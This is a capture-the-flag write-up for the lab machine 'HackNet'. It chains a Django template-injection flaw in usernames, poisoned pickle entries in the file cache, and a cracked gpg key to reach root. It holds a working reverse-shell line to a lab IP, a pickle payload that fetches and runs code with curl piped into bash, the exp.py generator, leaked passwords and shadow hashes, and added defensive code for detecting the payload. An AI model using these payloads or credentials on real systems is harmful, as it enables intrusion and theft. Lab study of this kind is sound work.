Basic information

Port scan

Only 22 and 80 are open:

$ nmap -sC -sV -Pn 10.10.11.85
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-22 19:04 JST
Nmap scan report for 10.10.11.85
Host is up (0.19s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0)
| ssh-hostkey:
| 256 95:62:ef:97:31:82:ff:a1:c6:08:01:8c:6a:0f:dc:1c (ECDSA)
|_ 256 5f:bd:93:10:20:70:e6:09:f1:ba:6a:43:58:86:42:66 (ED25519)
80/tcp open http nginx 1.22.1
|_http-title: Did not follow redirect to http://hacknet.htb/
|_http-server-header: nginx/1.22.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.84 seconds

80

Port 80 redirects to hacknet.htb, so add a hosts entry:

10.10.11.85 hacknet.htb

HackNet

Register any account and log in:

SSTI

The initial vector is somewhat hidden: a Django SSTI that only fires after you set the payload as your username and then perform a specific action. The two usernames used:

{{users}}
{{users.values}}

After changing the username, like any post, then fetch that post's likes list; rendering the likers' names evaluates the template expression in the username and triggers the SSTI:
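Why a username of {{users.values}} dumps the whole table: Django resolves a dotted variable by trying a dict key, then an attribute, then an index, and calls the result if it is callable, so users.values becomes users.values(), i.e. every column of every row. The following added example (not code from the writeup or from the HackNet application) re-implements that lookup in miniature and contrasts the vulnerable pattern (template source assembled from usernames) with the fixed one (usernames passed only as context data). The Row/FakeQuerySet classes and the column names are constructed stand-ins, not the real schema.

```python
import re

# Matches {{ var.path }} the way Django's variable nodes do (no filters/tags)
VAR_RE = re.compile(r"\{\{\s*([\w.]+)\s*\}\}")


class Row:
    """Stand-in for a model instance (constructed sample data)."""
    def __init__(self, **fields):
        self.__dict__.update(fields)

    def __str__(self):
        return "<User: %s>" % self.username


class FakeQuerySet:
    """Stand-in for a QuerySet: iterable, indexable, with a .values() that
    returns every column of every row (including password fields)."""
    def __init__(self, rows):
        self._rows = rows

    def __iter__(self):
        return iter(self._rows)

    def __getitem__(self, i):
        return self._rows[i]

    def values(self):
        return [dict(r.__dict__) for r in self._rows]

    def __str__(self):
        return "<QuerySet [%s]>" % ", ".join(str(r) for r in self._rows)


def resolve(expr, context):
    """Django's Variable._resolve_lookup in miniature: for each dotted part try
    a dict key, then an attribute, then a list index, and call the result when
    it is callable (Django only skips callables flagged alters_data or
    do_not_call_in_templates). Unresolvable variables render as ''."""
    current = context
    for bit in expr.split("."):
        try:
            current = current[bit]
        except (TypeError, KeyError, IndexError):
            try:
                current = getattr(current, bit)
            except AttributeError:
                try:
                    current = current[int(bit)]
                except (ValueError, TypeError, IndexError):
                    return ""
        if callable(current):
            current = current()  # this is what turns users.values into users.values()
    return current


def render(template_src, context):
    """Minimal {{ var }} substitution; the replacement is never re-parsed."""
    return VAR_RE.sub(lambda m: str(resolve(m.group(1), context)), template_src)


def render_likes_vulnerable(likers, context):
    """The bug: the template *source* is built from usernames, so a username
    containing {{ ... }} is compiled and evaluated against the view's context."""
    src = "".join("<li>%s</li>" % name for name in likers)
    return render(src, context)


def render_likes_safe(likers, context):
    """The fix: a constant template; usernames enter only as context data."""
    return "".join(render("<li>{{ name }}</li>", {"name": name}) for name in likers)


# Constructed sample context with hypothetical column names.
CONTEXT = {
    "users": FakeQuerySet([
        Row(username="deepdive", email="deepdive@hacknet.htb", password="s3cret"),
        Row(username="mikey", email="mikey@hacknet.htb", password="also-s3cret"),
    ])
}
# The attacker's renamed account followed by an ordinary liker.
LIKERS = ["{{users.values}}", "deepdive"]

if __name__ == "__main__":
    print(render_likes_vulnerable(LIKERS, CONTEXT))  # leaks every column of every user
    print(render_likes_safe(LIKERS, CONTEXT))        # braces come out as literal text
```

The same lookup rules are why the shorter {{users}} on the page only shows the queryset's repr (usernames) while {{users.values}} shows the underlying column data.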

deepdive

The intermediate user we need is deepdive; find a post he has liked, for example post id 15, and the leaked record gives his credentials:

deepdive@hacknet.htb
deepdive
D33pD!v3r

backdoor_bandit

Log in with deepdive's account and note backdoor_bandit in the friends list:

backdoor_bandit has liked deepdive's profile, but we cannot simply rename deepdive to the payload, so from deepdive's account add our own (payload-named) account as a friend and then pull backdoor_bandit's record through the SSTI:

mikey@hacknet.htb
backdoor_bandit
mYd4rks1dEisH3re

user flag

The backdoor_bandit password works for SSH as mikey:

Django cache to sandy

After using search or explore on the web app, Django cache files appear on disk:

Django's file-based cache stores pickles, so we replace the entries. Note that the payload written below is a bare pickle rather than a well-formed cache file: FileBasedCache.get() first pickle.load()s the expiry value at the head of the file before it ever touches the compressed value, so the object is reduced (and the command run) on the very next cache read.

# index.html, served from the attacker host; the pickle payload fetches and runs it
/bin/bash -i >& /dev/tcp/10.10.14.30/4444 0>&1

# generate the base64 pickle that calls os.system("curl 10.10.14.30|bash") (exp.py below)
python3 exp.py

gASVMAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjBVjdXJsIDEwLjEwLjE0LjMwfGJhc2iUhZRSlC4=

# replace every cache entry with the payload so whichever key the app reads next fires it
mikey@hacknet:/var/tmp/django_cache$ for i in $(ls); do rm -f $i; echo 'gASVMAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjBVjdXJsIDEwLjEwLjE0LjMwfGJhc2iUhZRSlC4=' |base64 -d> $i; chmod 777 $i; done

Then reload the corresponding page (with a listener on 4444 and an HTTP server on 10.10.14.30 serving index.html); the app deserializes the poisoned entry and we get a shell as sandy:

exp.py

import pickle
import base64
import os


# Object whose pickle reduces to os.system(...), so unpickling runs the command
class Exploit:
    def __reduce__(self):
        return (os.system, ("curl 10.10.14.30|bash",))


payload = base64.b64encode(pickle.dumps(Exploit()))
print(payload.decode())
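From the defender's side, the same payload is easy to recognise without ever executing it. The added example below (not code from the writeup) disassembles the base64 blob above with pickletools to list the globals it would import, and shows a restricted Unpickler whose find_class refuses anything outside an allow-list, which blocks the payload at the STACK_GLOBAL step before REDUCE can call posix.system. SAFE_GLOBALS and the benign sample entry are constructed for illustration.

```python
import base64
import io
import pickle
import pickletools

# The base64 payload from the writeup, used here only as sample input.
PAYLOAD_B64 = "gASVMAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjBVjdXJsIDEwLjEwLjE0LjMwfGJhc2iUhZRSlC4="
PAYLOAD = base64.b64decode(PAYLOAD_B64)

# A plausible, harmless cache value (constructed): a dict of simple types.
BENIGN_ENTRY = pickle.dumps({"hits": 3, "tags": ["a", "b"]})

# Hypothetical allow-list of globals a cache value is permitted to import.
SAFE_GLOBALS = {("builtins", "set"), ("builtins", "frozenset"), ("datetime", "datetime")}

# Opcodes that push a str onto the stack; STACK_GLOBAL consumes the last two.
STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING",
              "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}
# Opcodes that construct objects or call callables.
CALL_OPS = {"REDUCE", "BUILD", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX"}


def pickle_globals(data):
    """Static scan: return every (module, name) the pickle would import,
    covering GLOBAL (proto <= 3, arg is 'module name') and STACK_GLOBAL
    (proto >= 4, takes the two most recently pushed strings). This follows
    pushed strings rather than emulating the full stack, which is enough for
    payloads produced by __reduce__."""
    found, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif op.name == "STACK_GLOBAL":
            found.append((strings[-2], strings[-1]))
        elif op.name in STRING_OPS:
            strings.append(arg)
    return found


def has_calls(data):
    """True if the pickle contains any object-construction/callable opcode."""
    return any(op.name in CALL_OPS for op, _a, _p in pickletools.genops(data))


def is_cache_entry_malicious(data):
    """Flag an entry that imports anything outside the allow-list."""
    return any(g not in SAFE_GLOBALS for g in pickle_globals(data))


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that only resolves allow-listed globals. find_class is invoked
    by GLOBAL/STACK_GLOBAL, so the payload is rejected before its REDUCE."""
    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError("refused global %s.%s" % (module, name))


def load_or_block(data):
    """Return ('ok', value) or ('blocked', reason) without running the payload."""
    try:
        return ("ok", RestrictedUnpickler(io.BytesIO(data)).load())
    except pickle.UnpicklingError as e:
        return ("blocked", str(e))


if __name__ == "__main__":
    print(pickle_globals(PAYLOAD))           # [('posix', 'system')]
    print(is_cache_entry_malicious(PAYLOAD))  # True
    print(load_or_block(PAYLOAD))             # ('blocked', 'refused global posix.system')
    print(load_or_block(BENIGN_ENTRY))        # ('ok', {'hits': 3, 'tags': ['a', 'b']})
```

Note that os.system pickles as posix.system, which is why the scan reports the posix module; any allow-list or detection rule has to match the module pickle actually records, not the alias the exploit author typed.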

gpg

In sandy's home directory there is an armored_key.asc:

The backups directory also holds several gpg-encrypted SQL dumps:

So first crack the passphrase of the private key with john:

gpg2john armored_key.asc > hash.txt

sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=gpg

sweetheart

backup02.sql.gpg

Then import the key and decrypt the dumps; backup02 contains a password that turns out to be the root password:

gpg --import armored_key.asc
gpg --output backup02.sql --decrypt backup02.sql.gpg

h4ck3rs4re3veRywh3re99

root flag

Switch to root with that password:

shadow

root:$y$j9T$eErHv1Ni5SMAxSFoqTEr50$xWrccq.2xlr5SK8EVQJirlRcjFhiJ2ZR7/qffCp4JX1:19874:0:99999:7:::
mikey:$y$j9T$xbgiDokk.SkF6LfxRj17s.$97Ppf4gQ3MVuwiqUPLOox4IAaSRwbB/ZCx0XQYsD8r9:19874:0:99999:7:::
sandy:$y$j9T$VYCki/awnyWb6fcUoC0wt0$F2m2BtdGa9d9lUJn3SucfnXFM/yXNhzF8hHZSW65eUB:19907:0:99999:7:::

References